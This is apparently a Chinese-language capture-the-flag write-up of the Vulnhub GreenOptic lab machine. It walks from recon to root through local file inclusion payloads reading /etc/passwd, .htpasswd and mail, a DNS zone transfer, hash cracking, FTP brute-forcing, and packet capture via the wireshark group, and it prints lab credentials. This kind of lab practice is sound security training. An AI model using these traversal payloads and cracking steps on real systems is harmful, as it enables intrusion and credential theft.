Vulnhub之GreenOptics靶机详细测试过程
GreenOptics
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:05 1 60 Unknown vendor
192.168.56.100 08:00:27:2b:10:e6 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:31:b2:9c 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-28 20:25 EDT
Nmap scan report for inplainsight (192.168.56.254)
Host is up (0.00039s latency).
Not shown: 65377 filtered tcp ports (no-response), 153 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 462032edf07411edfda7a417abf6f021 (RSA)
| 256 b6fb6410390ef9be8b5ad0d2413e6768 (ECDSA)
|_ 256 24270bc9355f277e1a8273e069cc0f96 (ED25519)
53/tcp open domain ISC BIND 9.11.4-P2 (RedHat Enterprise Linux 7)
| dns-nsid:
|_ bind.version: 9.11.4-P2-RedHat-9.11.4-16.P2.el7_8.6
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: GreenOptic
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
10000/tcp open http MiniServ 1.953 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=utf-8).
|_http-server-header: MiniServ/1.953
MAC Address: 08:00:27:31:B2:9C (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:redhat:enterprise_linux:7
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 184.73 seconds
NMAP扫描结果表明目标主机有5个开放端口:21(ftp)、22(ssh)、53(dns)、80(http)、10000(http)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ curl http://192.168.56.254:10000/
<h1>Error - Document follows</h1>
<p>This web server is running in SSL mode. Try the URL <a href='https://websrv01.greenoptic.vm:10000/'>https://websrv01.greenoptic.vm:10000/</a> instead.</p>
说明需要添加主机记录到/etc/hosts文件:
┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.254 websrv01.greenoptic.vm
再次访问:
https://websrv01.greenoptic.vm:10000/
返回页面为用户登录界面,10000端口的信息收集暂时告一段落。
──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ nikto -h http://192.168.56.254
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.254
+ Target Hostname: 192.168.56.254
+ Target Port: 80
+ Start Time: 2023-04-28 20:35:07 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS) PHP/5.4.16
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ PHP/5.4.16 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Retrieved x-powered-by header: PHP/5.4.16
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8724 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2023-04-28 20:36:00 (GMT-4) (53 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
nikto没有得到80端口有价值的信息。
┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,sh,php,js,html
[+] Timeout: 10s
===============================================================
2023/04/28 20:39:13 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 17119]
/.html (Status: 403) [Size: 207]
/img (Status: 301) [Size: 234] [--> http://192.168.56.254/img/]
/account (Status: 301) [Size: 238] [--> http://192.168.56.254/account/]
/css (Status: 301) [Size: 234] [--> http://192.168.56.254/css/]
/js (Status: 301) [Size: 233] [--> http://192.168.56.254/js/]
/LICENSE.txt (Status: 200) [Size: 17128]
/statement.html (Status: 200) [Size: 6687]
/.html (Status: 403) [Size: 207]
Progress: 1321725 / 1323366 (99.88%)===============================================================
2023/04/28 20:41:18 Finished
===============================================================
访问/account,返回是另一个用户登录。
http://192.168.56.254/account/index.php?include=cookiewarning
但是注意到URL,此处可能存在本地文件包含漏洞。
┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ curl http://192.168.56.254/account/index.php?include=../../../../etc/passwd
<!DOCTYPE html>
<html lang="en">
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
sam:x:1000:1000::/home/sam:/bin/bash
terry:x:1001:1001::/home/terry:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
alex:x:1002:1002::/home/alex:/bin/bash
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:997:993:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
monitor:x:1003:1003::/home/monitor:/bin/bash
saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin
</body>
</html>
经过测试,目标页面确实存在本地文件包含漏洞,那接下来的任务就是如何利用该漏洞获得shell了
在Kali Linux上本地启动http.server(可以任意创建一个文本文件用于测试),然后访问以下URL:
http://192.168.56.254/account/index.php?include=http://192.168.56.206:8000/test.txt
从结果来看目标主机不存在远程文件包含漏洞,接下来看是否可以获取用户SSH私钥文件。
逐一测试各个用户(sam, terry, alex, monitor)家目录下/.ssh/id_rsa文件是否存在,如:
http://192.168.56.254/account/index.php?include=../../../../home/monitor/.ssh/id_rsa
经过测试没有获取任何SSH私钥文件。
接下来看是否可以破解这些用户的FTP密码
将所有普通用户生成用户字典:
──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ cat user.dict
sam
terry
alex
monitor
──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ hydra -L user.dict -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.254 -f
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-28 21:56:28
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 57377596 login tries (l:4/p:14344399), ~3586100 tries per task
[DATA] attacking ftp://192.168.56.254:21/
没有破解出密码。
因为作者给出明显的提示,域名是websrv01.greenoptic.vm,除了websrv01有其他子域名
──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ dig @192.168.56.254 greenoptic.vm axfr
; <<>> DiG 9.18.8-1-Debian <<>> @192.168.56.254 greenoptic.vm axfr
; (1 server found)
;; global options: +cmd
greenoptic.vm. 3600 IN SOA websrv01.greenoptic.vm. root.greenoptic.vm. 1594567384 3600 600 1209600 3600
greenoptic.vm. 3600 IN NS ns1.greenoptic.vm.
ns1.greenoptic.vm. 3600 IN A 127.0.0.1
recoveryplan.greenoptic.vm. 3600 IN A 127.0.0.1
websrv01.greenoptic.vm. 3600 IN A 127.0.0.1
greenoptic.vm. 3600 IN SOA websrv01.greenoptic.vm. root.greenoptic.vm. 1594567384 3600 600 1209600 3600
;; Query time: 4 msec
;; SERVER: 192.168.56.254#53(192.168.56.254) (TCP)
;; WHEN: Fri Apr 28 22:12:31 EDT 2023
;; XFR size: 6 records (messages 1, bytes 235)
利用dig工具发现了recoveryplan子域名,将该子域名添加到/etc/hosts文件中:
──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.254 websrv01.greenoptic.vm
192.168.56.254 recoveryplan.greenoptic.vm
访问该子域名,需要网页基本认证,尝试一些弱口令失败,因为基本认证的用户名和密码存在.htpasswd文件中,看能否获取该文件内容
(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ curl http://192.168.56.254/account/index.php?include=../../../../../var/www/.htpasswdstaff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po.
</body>
</html>
将密码破解:
┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
wheeler (?)
1g 0:00:00:00 DONE (2023-04-29 04:29) 9.090g/s 120436p/s 120436c/s 120436C/s guess1..lorena1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
用上述用户名和密码访问
该帖子中有一个dpi.zip文件,将其下载到Kali Linux本地,而且提到:have e-mailed you the password,因此再用前面的本地文件包含漏洞读取邮件(发给sam的邮件):
http://192.168.56.254/account/index.php?include=../../../../../var/mail/sam
From terry@greenoptic.vm Sun Jul 12 16:13:45 2020
Return-Path: <terry@greenoptic.vm>
X-Original-To: sam
Delivered-To: sam@websrv01.greenoptic.vm
Received: from localhost (localhost [IPv6:::1])
by websrv01.greenoptic.vm (Postfix) with ESMTP id A8D371090085
for <sam>; Sun, 12 Jul 2020 16:13:18 +0100 (BST)
Message-Id: <20200712151322.A8D371090085@websrv01.greenoptic.vm>
Date: Sun, 12 Jul 2020 16:13:18 +0100 (BST)
From: terry@greenoptic.vm
Hi Sam, per the team message, the password is HelloSunshine123
┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ unzip dpi.zip
Archive: dpi.zip
[dpi.zip] dpi.pcap password:
inflating: dpi.pcap
┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ ls -alh
total 148M
drwxr-xr-x 2 kali kali 4.0K Apr 29 04:36 .
drwxr-xr-x 121 kali kali 4.0K Apr 28 20:24 ..
-rw-r--r-- 1 kali kali 332K Jul 12 2020 dpi.pcap
-rw-r--r-- 1 kali kali 71K Apr 29 04:35 dpi.zip
-rw-r--r-- 1 kali kali 38 Apr 29 04:29 hash
-rw-r--r-- 1 kali kali 148M Apr 28 22:10 hydra.restore
-rw-r--r-- 1 root root 1.4K Apr 28 20:28 nmap_full_scan
-rw-r--r-- 1 kali kali 12 Apr 28 21:10 test.txt
-rw-r--r-- 1 kali kali 23 Apr 28 21:16 user.dict
用上面本地文件包含漏洞读取到的密码解压缩dpi.zip文件,得到dpi.pcap
利用wireshark工具打开pcap文件,可以看到ftp的用户名和密码:
用户名:alex
密码: FwejAASD1
登录FTP服务:
┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 (vsFTPd 3.0.2)
Name (192.168.56.254:kali): alex
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||28596|).
ftp: Can't connect to `192.168.56.254:28596': No route to host
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwx------ 3 1002 1002 136 Jul 12 2020 .
drwxr-xr-x 6 0 0 57 Jul 12 2020 ..
-rw------- 1 1002 1002 100 Jul 12 2020 .Xauthority
lrwxrwxrwx 1 0 0 9 Jul 12 2020 .bash_history -> /dev/null
-rw-r--r-- 1 1002 1002 18 Apr 01 2020 .bash_logout
-rw-r--r-- 1 1002 1002 193 Apr 01 2020 .bash_profile
-rw-r--r-- 1 1002 1002 231 Apr 01 2020 .bashrc
drwxr-xr-x 2 1002 1002 41 Jul 12 2020 .wireshark
-rwx------ 1 1002 1002 70 Jul 12 2020 user.txt
226 Directory send OK.
ftp> get user.txt
local: user.txt remote: user.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for user.txt (70 bytes).
100% |*********************************************************************************| 70 77.50 KiB/s 00:00 ETA
226 Transfer complete.
70 bytes received in 00:00 (54.73 KiB/s)
ftp> pwd
Remote directory: /home/alex
用相同的用户名和密码登录SSH:
──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ ssh alex@192.168.56.254
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:FkUejrDoIcwfG8KzsYAElBrX2BbWcAHiVWnR8k0k0Kk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
alex@192.168.56.254's password:
[alex@websrv01 ~]$ ls -alh
total 20K
drwx------. 3 alex alex 136 Jul 12 2020 .
drwxr-xr-x. 6 root root 57 Jul 12 2020 ..
lrwxrwxrwx. 1 root root 9 Jul 12 2020 .bash_history -> /dev/null
-rw-r--r--. 1 alex alex 18 Apr 1 2020 .bash_logout
-rw-r--r--. 1 alex alex 193 Apr 1 2020 .bash_profile
-rw-r--r--. 1 alex alex 231 Apr 1 2020 .bashrc
-rwx------. 1 alex alex 70 Jul 12 2020 user.txt
drwxr-xr-x. 2 alex alex 41 Jul 12 2020 .wireshark
-rw-------. 1 alex alex 100 Jul 12 2020 .Xauthority
[alex@websrv01 ~]$ cd ..
[alex@websrv01 home]$ ls -alh
total 0
drwxr-xr-x. 6 root root 57 Jul 12 2020 .
dr-xr-xr-x. 17 root root 244 Jul 13 2020 ..
drwx------. 3 alex alex 136 Jul 12 2020 alex
drwx------. 2 monitor monitor 62 Jul 12 2020 monitor
drwx------. 2 sam sam 62 Jul 12 2020 sam
drwx------. 2 terry terry 83 Jul 12 2020 terry
[alex@websrv01 home]$
提权
[alex@websrv01 home]$ id
uid=1002(alex) gid=1002(alex) groups=1002(alex),994(wireshark)
发现id隶属于wireshark组,这样alex可以运行wireshark命令行工具dumpcap,即
用dumpcap工具抓包,抓本地环回接口的包,然后将其下载到Kali LInux本地,
利用wireshar k打开:
AHJvb3QAQVNmb2pvajJlb3p4Y3p6bWVkbG1lZEFTQVNES29qM28=
将其base64解码:
┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ echo 'AHJvb3QAQVNmb2pvajJlb3p4Y3p6bWVkbG1lZEFTQVNES29qM28=' | base64 -d
rootASfojoj2eozxczzmedlmedASASDKoj3o
root密码为ASfojoj2eozxczzmedlmedASASDKoj3o:
[root@websrv01 ~]# ls -alh
total 60K
dr-xr-x---. 5 root root 4.0K Jul 13 2020 .
dr-xr-xr-x. 17 root root 244 Jul 13 2020 ..
-rw-------. 1 root root 1.3K Jul 12 2020 anaconda-ks.cfg
lrwxrwxrwx. 1 root root 9 Jul 12 2020 .bash_history -> /dev/null
-rw-r--r--. 1 root root 18 Dec 29 2013 .bash_logout
-rw-r--r--. 1 root root 176 Dec 29 2013 .bash_profile
-rw-r--r--. 1 root root 176 Dec 29 2013 .bashrc
-rw-r--r--. 1 root root 100 Dec 29 2013 .cshrc
drwx------. 2 root root 99 Jul 12 2020 .gnupg
-rw-------. 1 root root 45 Jul 12 2020 .lesshst
-rw-r--r--. 1 root root 32 Jul 12 2020 .monit.id
-rw-------. 1 root root 800 Apr 29 03:22 .monit.state
drwxr-----. 3 root root 19 Jul 12 2020 .pki
-rw-------. 1 root root 1.0K Jul 12 2020 .rnd
-rwx------. 1 root root 837 Jul 12 2020 root.txt
-rw-r--r--. 1 root root 129 Dec 29 2013 .tcshrc
-rw------- 1 root root 5.7K Jul 13 2020 .viminfo
drwxr-xr-x. 2 root root 41 Jul 12 2020 .wireshark
-rw-------. 1 root root 50 Jul 12 2020 .Xauthority
[root@websrv01 ~]# cat root.txt
Congratulations on getting root!
____ ___ _ _
/ ___|_ __ ___ ___ _ __ / _ \ _ __ | |_(_) ___
| | _| '__/ _ \/ _ \ '_ \| | | | '_ \| __| |/ __|
| |_| | | | __/ __/ | | | |_| | |_) | |_| | (__
\____|_| \___|\___|_| |_|\___/| .__/ \__|_|\___|
|_|
You've overcome a series of difficult challenges, so well done!
I'm happy to make my CTFs available for free. If you enjoyed doing the CTF, please leave a comment on my blog at https://security.caerdydd.wales - I will be happy for your feedback so I can improve them and make them more enjoyable in the future.
*********
Kindly place your vote on the poll located here to let me know how difficult you found it: https://security.caerdydd.wales/greenoptic-ctf/
*********
Thanks,
bootlesshacker
[root@websrv01 ~]#
STRIVE FOR PROGRESS,NOT FOR PERFECTION
